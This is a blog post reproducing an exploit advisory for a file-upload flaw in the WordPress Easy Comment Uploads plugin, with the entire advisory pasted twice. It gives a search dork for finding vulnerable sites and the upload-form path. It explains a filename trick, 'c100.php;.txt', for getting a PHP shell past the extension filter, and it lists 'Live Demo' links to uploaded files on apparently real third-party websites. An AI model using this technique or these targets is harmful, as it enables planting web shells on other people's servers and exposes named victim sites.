Wordpress Plugin EasyComent Vulnerability
Labels:
Exploits
|
No comment yet
#########################################################
# Title : Wordpress Plugin EasyComment Upload Vulnerability
# Author: Z190T
# Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
# Email : mahruz.id@gmail.com
# Date : 19/05/2011
# Category : PHP [File Upload Vulnerability]
# Tested on: [Windows XP3, Linux Ubuntu]
#########################################################
*_Dork_*
# “/easy-comment-uploads/upload-form.php”
*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
# File Extention [.txt],[.jpg],[gif],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/05/c100.php;.txt
=========================================================
Live Demo :
http://www.top100todo.com/wp-content/uploads/2011/10/h3ll0s.jpg
http://eleventigers.net/111/wp-content/uploads/2011/10/h3ll0s.jpg
http://romsey.blurryfox.com/wp-content/uploads/2011/10/h3ll0s.jpg
# Title : Wordpress Plugin EasyComment Upload Vulnerability
# Author: Z190T
# Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
# Email : mahruz.id@gmail.com
# Date : 19/05/2011
# Category : PHP [File Upload Vulnerability]
# Tested on: [Windows XP3, Linux Ubuntu]
#########################################################
*_Dork_*
# “/easy-comment-uploads/upload-form.php”
*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
# File Extention [.txt],[.jpg],[gif],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/05/c100.php;.txt
=========================================================
Live Demo :
http://www.top100todo.com/wp-content/uploads/2011/10/h3ll0s.jpg
http://eleventigers.net/111/wp-content/uploads/2011/10/h3ll0s.jpg
http://romsey.blurryfox.com/wp-content/uploads/2011/10/h3ll0s.jpg
Post a Comment